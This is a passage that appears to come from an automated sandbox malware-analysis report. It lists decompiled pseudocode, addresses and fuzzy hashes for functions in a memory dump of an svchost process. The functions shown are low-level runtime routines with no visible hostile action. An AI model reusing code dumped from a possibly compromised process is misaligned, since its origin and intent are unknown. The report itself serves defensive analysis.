                                          0x03a5a790
                                          0x03a5a792
                                          0x03a5a741
                                          0x03a5a741
                                          0x03a5a743
                                          0x03a5a749
                                          0x03a5a749
                                          0x03a5a732
                                          0x03a5a73a
                                          0x03a5a797
                                          0x03a5a79d
                                          0x03a5a7a3
                                          0x03a5a7a9
                                          0x03a5a7b6
                                          0x03a5a7bc
                                          0x03a5a7ca
                                          0x03a5a7e0
                                          0x03a5a7e2
                                          0x03a5a7e4
                                          0x03a99bf2
                                          0x00000000
                                          0x03a99bf2
                                          0x03a5a7ed
                                          0x03a5a7f2
                                          0x03a5a800
                                          0x03a5a805
                                          0x03a5a80d
                                          0x03a5a812
                                          0x03a99c08
                                          0x03a99c08
                                          0x03a5a818
                                          0x03a5a81b
                                          0x03a5a821
                                          0x03a5a824
                                          0x00000000
                                          0x03a5a824
                                          0x03a5a7ae
                                          0x00000000
                                          0x03a5a7ae
                                          0x03a5a73c
                                          0x03a5a73e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85ba6b0c6d8c529377426b356d2c2526c05ab727807a2bc9d4aa6bcd316c2ee9
                                          • Instruction ID: 509a3ff3a25fb3f11b08ffac1b66bf0d1725b6716766a0132d796a8956d7528b
                                          • Opcode Fuzzy Hash: 85ba6b0c6d8c529377426b356d2c2526c05ab727807a2bc9d4aa6bcd316c2ee9
                                          • Instruction Fuzzy Hash: AF31E0B1720204EFC712EB08EAA2F1BBBF9FB85704F440A9AE414C7644DB749900CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2AA16 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E03A2AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x3b1d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3b17b9c; // 0x0
					_t53 = L03A44620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E03A6B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E03A6F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03A36C59(_t53, _t51, _t58) != 0) {
							_t28 = E03A55E50(0x3a0c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E03A5B230(_v32, _v28, 0x3a0c2d8, 1,  &_v24);
								_t28 = E03A2F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                          0x03a2aa25
                                          0x03a2aa29
                                          0x03a2aa2d
                                          0x03a2aa30
                                          0x03a2aa37
                                          0x03a2aa3c
                                          0x03a84458
                                          0x03a84458
                                          0x03a84472
                                          0x03a84474
                                          0x03a84476
                                          0x03a2aa64
                                          0x03a2aa74
                                          0x03a8447c
                                          0x03a84483
                                          0x03a84492
                                          0x03a2aa52
                                          0x03a2aa54
                                          0x03a2aa5e
                                          0x03a844a8
                                          0x03a844ad
                                          0x03a844af
                                          0x03a844b6
                                          0x03a844b6
                                          0x03a844b9
                                          0x03a844bc
                                          0x03a844cd
                                          0x03a844d3
                                          0x03a844d6
                                          0x03a844e1
                                          0x03a844e1
                                          0x03a844e6
                                          0x03a844e8
                                          0x03a844fb
                                          0x03a844fb
                                          0x03a844e8
                                          0x00000000
                                          0x03a2aa5e
                                          0x03a84476
                                          0x03a2aa42
                                          0x03a2aa46
                                          0x03a2aa48
                                          0x03a2aa4c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 124717af73857f81ec64b9a68cc9c52bf386e0b4156268ef4e9bb6b2b0664fb2
                                          • Instruction ID: 3cbbf3287a83f9d0583950c9b073e1a2c2017707c59b1bcf5cefea60653f7df4
                                          • Opcode Fuzzy Hash: 124717af73857f81ec64b9a68cc9c52bf386e0b4156268ef4e9bb6b2b0664fb2
                                          • Instruction Fuzzy Hash: E931E571A00229ABCF14EF69CE81A7FB7B8FF48700B05406BF911DB250EB349910C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A561A0 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E03A561A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03A55E50(0x3a067cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03AF9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E03A2F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                          0x03a561b3
                                          0x03a561b5
                                          0x03a561bd
                                          0x03a561c3
                                          0x03a561c7
                                          0x03a561d2
                                          0x03a561ff
                                          0x03a561ff
                                          0x03a56201
                                          0x03a56207
                                          0x03a56207
                                          0x03a561d4
                                          0x03a561d9
                                          0x00000000
                                          0x00000000
                                          0x03a561df
                                          0x03a561e2
                                          0x00000000
                                          0x00000000
                                          0x03a561e6
                                          0x03a561e8
                                          0x03a561ee
                                          0x03a561ee
                                          0x03a561f9
                                          0x03a9762f
                                          0x03a97632
                                          0x03a97635
                                          0x03a97639
                                          0x03a97640
                                          0x03a9766e
                                          0x03a97675
                                          0x00000000
                                          0x00000000
                                          0x03a97681
                                          0x03a97689
                                          0x03a9768d
                                          0x03a97691
                                          0x03a97695
                                          0x03a97699
                                          0x03a976af
                                          0x03a976b5
                                          0x03a976b7
                                          0x03a976b7
                                          0x03a976d7
                                          0x03a976dc
                                          0x00000000
                                          0x03a976dc
                                          0x03a976a2
                                          0x03a976a9
                                          0x03a97651
                                          0x03a97653
                                          0x03a97653
                                          0x03a97656
                                          0x03a97656
                                          0x00000000
                                          0x03a97656
                                          0x03a97644
                                          0x03a97646
                                          0x03a97648
                                          0x03a97648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d290063c0e2d2d4654c72837b6b49ff088e6d8cf8c0d49938206cc7bfadd4b31
                                          • Instruction ID: 892cd8057c1cbba9e360357bb023e4e0881b4fe1f3927d9eb780256645820864
                                          • Opcode Fuzzy Hash: d290063c0e2d2d4654c72837b6b49ff088e6d8cf8c0d49938206cc7bfadd4b31
                                          • Instruction Fuzzy Hash: 1C3169716153018FE720CF09C900B2AF7E4FB88B00F48496FB998AB361E775E804CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A64A2C Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E03A64A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x3b1d360 ^ _t62;
				_v8 =  *0x3b1d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03A42280(_t26, 0x3b18608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E03A3FFB0(_t41, _t51, 0x3b18608);
						L2:
						 *0x3b1b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E03A6B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03A42280(_t28, 0x3b18608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E03A3FFB0(_t42, _t53, 0x3b18608);
							if(_t53 != 0) {
								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E03A3FFB0(_t41, _t51, 0x3b18608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                          0x03a64a2c
                                          0x03a64a34
                                          0x03a64a3c
                                          0x03a64a3e
                                          0x03a64a48
                                          0x03a64a4b
                                          0x03a64a4d
                                          0x03a64a51
                                          0x03a64a9c
                                          0x00000000
                                          0x00000000
                                          0x03a64aa3
                                          0x03a64aa8
                                          0x03a64aad
                                          0x03a64ab1
                                          0x03a64ade
                                          0x03a64ae3
                                          0x03a64a5a
                                          0x03a64a62
                                          0x03a64a6a
                                          0x03a64a6e
                                          0x03a9f203
                                          0x03a64a84
                                          0x03a64a88
                                          0x03a64a89
                                          0x03a64a8a
                                          0x03a64a95
                                          0x03a64a95
                                          0x03a64a79
                                          0x03a64a80
                                          0x03a64af2
                                          0x03a64af4
                                          0x03a64af9
                                          0x03a64aff
                                          0x03a64b01
                                          0x03a64b03
                                          0x03a64b08
                                          0x03a9f20a
                                          0x03a9f212
                                          0x03a9f216
                                          0x03a9f216
                                          0x03a64b08
                                          0x03a64b13
                                          0x03a64b1a
                                          0x03a9f229
                                          0x03a9f229
                                          0x03a64b1a
                                          0x03a64a82
                                          0x00000000
                                          0x03a64a82
                                          0x03a64ab7
                                          0x03a64acd
                                          0x03a64acd
                                          0x03a64ad5
                                          0x03a64ada
                                          0x00000000
                                          0x03a64ada
                                          0x03a64ac2
                                          0x03a64acb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a64acb
                                          0x03a64a53
                                          0x03a64a53
                                          0x03a64a58
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 91fb878d8f692b2d1f87f607e122f9414c35a28c97192dbdc55fada393c578d0
                                          • Instruction ID: 6ae97572ad98d0e9bdb40b656fbe2c9e8b01ef72820b0465b8dbe52b6ab7b2d0
                                          • Opcode Fuzzy Hash: 91fb878d8f692b2d1f87f607e122f9414c35a28c97192dbdc55fada393c578d0
                                          • Instruction Fuzzy Hash: B031F136215754AFCB21DF15CE41B2AFBA8FBC9B14F48456FE8668B650C770D800CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A68EC7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E03A68EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x3b1d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03A54E70(0x3b186e4, 0x3a69490, 0, 0);
					if( *0x3b153e8 > 5 && E03A68F33(0x3b153e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x3b153e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x3b153e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x3a0bc46;
						_t48 = E03AA7B9C(0x3b153e8, 0x3a0bc46, _t67, 0x3b153e8, _t70,  &_v140);
					}
				}
				return E03A6B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                          0x03a68ec7
                                          0x03a68ed9
                                          0x03a68edc
                                          0x03a68ee6
                                          0x03a68ee9
                                          0x03a68eee
                                          0x03a68efc
                                          0x03a68f08
                                          0x03aa1349
                                          0x03aa1353
                                          0x03aa135d
                                          0x03aa1366
                                          0x03aa136f
                                          0x03aa1375
                                          0x03aa137c
                                          0x03aa1385
                                          0x03aa1390
                                          0x03aa1391
                                          0x03aa139c
                                          0x03aa139d
                                          0x03aa13a6
                                          0x03aa13ac
                                          0x03aa13b2
                                          0x03aa13b5
                                          0x03aa13bc
                                          0x03aa13bf
                                          0x03aa13c2
                                          0x03aa13c5
                                          0x03aa13c8
                                          0x03aa13cb
                                          0x03aa13ce
                                          0x03aa13d1
                                          0x03aa13d4
                                          0x03aa13d7
                                          0x03aa13da
                                          0x03aa13dd
                                          0x03aa13e0
                                          0x03aa13e3
                                          0x03aa13e6
                                          0x03aa13e9
                                          0x03aa13f6
                                          0x03aa1400
                                          0x03aa1400
                                          0x03a68f08
                                          0x03a68f32

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b830f66071d480ac443d57394ef681f64bbe57ce7d710293c4a3c1104aae54c0
                                          • Instruction ID: 97ac4a1f9d16d3d5d0d9a07ba5e52030d85addd84955e34e757a1a879d333beb
                                          • Opcode Fuzzy Hash: b830f66071d480ac443d57394ef681f64bbe57ce7d710293c4a3c1104aae54c0
                                          • Instruction Fuzzy Hash: 8A419FB5D003189EDB20CFAAD980AADFBF8FB48310F5041AFE509A7240E7755A84CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5E730 Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E03A5E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03A69670() < 0) {
					L03A7DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x3b17b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L03A44620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M03A5E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                          0x03a5e730
                                          0x03a5e736
                                          0x03a5e738
                                          0x03a5e73d
                                          0x03a5e73e
                                          0x03a5e740
                                          0x03a5e749
                                          0x03a5e765
                                          0x03a5e76a
                                          0x03a5e76b
                                          0x03a5e76c
                                          0x03a5e76d
                                          0x03a5e76e
                                          0x03a5e76f
                                          0x03a5e775
                                          0x03a5e777
                                          0x03a5e77e
                                          0x03a9b675
                                          0x03a5e784
                                          0x03a5e784
                                          0x03a5e789
                                          0x03a5e7a8
                                          0x03a5e7ac
                                          0x03a5e807
                                          0x03a5e7ae
                                          0x03a5e7ae
                                          0x03a5e7b1
                                          0x03a5e7b4
                                          0x03a5e7b9
                                          0x03a5e7c0
                                          0x03a5e7c4
                                          0x03a5e7ca
                                          0x03a5e7cc
                                          0x00000000
                                          0x03a5e7d3
                                          0x03a5e7d6
                                          0x00000000
                                          0x00000000
                                          0x03a5e7ff
                                          0x03a5e802
                                          0x00000000
                                          0x00000000
                                          0x03a5e7f9
                                          0x03a5e7fc
                                          0x00000000
                                          0x00000000
                                          0x03a5e7f3
                                          0x03a5e7f6
                                          0x00000000
                                          0x00000000
                                          0x03a5e7ed
                                          0x03a5e7f0
                                          0x00000000
                                          0x00000000
                                          0x03a5e7e7
                                          0x03a5e7ea
                                          0x00000000
                                          0x00000000
                                          0x03a9b685
                                          0x03a9b688
                                          0x00000000
                                          0x00000000
                                          0x03a9b682
                                          0x00000000
                                          0x00000000
                                          0x03a5e7cc
                                          0x03a5e7d9
                                          0x03a5e7dc
                                          0x03a5e7de
                                          0x03a5e7de
                                          0x03a5e7ac
                                          0x03a5e7e4
                                          0x03a5e74b
                                          0x03a5e751
                                          0x03a5e759
                                          0x03a5e761
                                          0x03a5e761

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee094f17e2c4e91dd7883b56ed6841abbbd3e1040ea6f075baae0b96f542fad0
                                          • Instruction ID: 11a536f1712ce0d5fe8da72861cc51f43834a87ce06e9c06855ca08e0b370551
                                          • Opcode Fuzzy Hash: ee094f17e2c4e91dd7883b56ed6841abbbd3e1040ea6f075baae0b96f542fad0
                                          • Instruction Fuzzy Hash: CA316B75A14249AFD744DF68D941F9ABBE8FB09314F14826AF908CB341D635E980CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5BC2C Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E03A5BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x3b16100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E03A42280(0xd, 0x1276f1a0);
				_t41 =  *0x3b160f8; // 0x0
				if(_t41 != 0) {
					 *0x3b160f8 =  *_t41;
					 *0x3b160fc =  *0x3b160fc + 0xffff;
				}
				E03A3FFB0(_t41, 0x800, 0x1276f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x3b160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L03A44620(0x3b16100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x3b16100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                          0x03a5bc36
                                          0x03a5bc42
                                          0x03a5bc45
                                          0x03a5bc4a
                                          0x03a5bd35
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a5bc50
                                          0x03a5bc50
                                          0x03a5bc58
                                          0x03a5bc5a
                                          0x03a5bc60
                                          0x00000000
                                          0x00000000
                                          0x03a9a4f2
                                          0x03a9a4f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a9a4fc
                                          0x03a5bc79
                                          0x03a5bc7e
                                          0x03a5bc86
                                          0x03a5bd16
                                          0x03a5bd20
                                          0x03a5bd20
                                          0x03a5bc8d
                                          0x03a5bc94
                                          0x03a5bcbd
                                          0x03a5bcca
                                          0x03a5bccb
                                          0x03a5bccc
                                          0x03a5bccd
                                          0x03a5bcce
                                          0x03a5bcd4
                                          0x03a5bcea
                                          0x03a5bcee
                                          0x03a5bcf2
                                          0x03a5bd00
                                          0x03a5bd04
                                          0x00000000
                                          0x03a5bc96
                                          0x03a5bcab
                                          0x03a5bcaf
                                          0x03a5bd2c
                                          0x03a5bd2c
                                          0x03a5bd09
                                          0x00000000
                                          0x03a5bd09
                                          0x03a5bcb1
                                          0x03a5bcb5
                                          0x03a5bcbb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a5bcbb

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d313669a3c38b7d97ccb2d66728aff6c695045d8d3b977688df632025e403f86
                                          • Instruction ID: 5f1381775c503030c7ee4faaf6e5a6b90a43824662c19e24ba9c932da9ff5502
                                          • Opcode Fuzzy Hash: d313669a3c38b7d97ccb2d66728aff6c695045d8d3b977688df632025e403f86
                                          • Instruction Fuzzy Hash: EA31EE36A006199FCB51EF58D4C0BA6B3B4FB18316F4501BAFD44DB245EB74DA05CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A29100 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E03A29100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x3aff6e8);
				E03A7D0E8(__ebx, __edi, __esi);
